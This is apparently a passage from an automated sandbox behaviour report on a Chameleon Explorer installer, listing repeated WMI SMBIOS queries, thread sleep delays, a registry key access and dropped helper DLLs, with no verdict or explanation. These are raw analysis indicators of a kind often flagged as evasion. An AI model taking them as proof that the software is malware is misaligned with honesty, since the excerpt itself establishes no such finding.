Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables

Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe TID: 5768	Thread sleep count: 381 > 30	Jump to behavior
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe TID: 6752	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe TID: 6888	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe TID: 4508	Thread sleep time: -59100s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Window / User API: threadDelayed 381			Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Window / User API: threadDelayed 591			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04090409

Jump to behavior

Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CO8MN.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-MIQ4J.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-0AE3R.tmp	Jump to dropped file
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-BP5O1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy)	Jump to dropped file
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backup	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-NOOMK.tmp	Jump to dropped file
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

